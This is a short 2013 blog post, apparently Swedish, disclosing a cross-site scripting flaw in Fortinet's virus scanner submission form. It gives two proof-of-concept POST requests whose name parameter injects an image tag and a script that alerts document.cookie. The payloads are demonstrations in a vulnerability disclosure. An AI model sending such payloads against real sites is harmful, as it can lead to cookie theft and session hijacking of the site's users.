This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Gå till toppen
18.97.14.88.US.SSL

Fortiguard.com virus scanner submission form XSS bug

Vulnerable page: https://submission.fortinet.com/ @ http://www.fortiguard.com/

PoC
POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><img src=http://te-home.net/images/logo.png>

POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><script>alert(document.cookie)</script>

You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.

Image tag
Script tag


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Postat av RoLex den 2013-11-28 08:39 0 likes

Kommentarer

There are no comments for this news article, you can leave one here.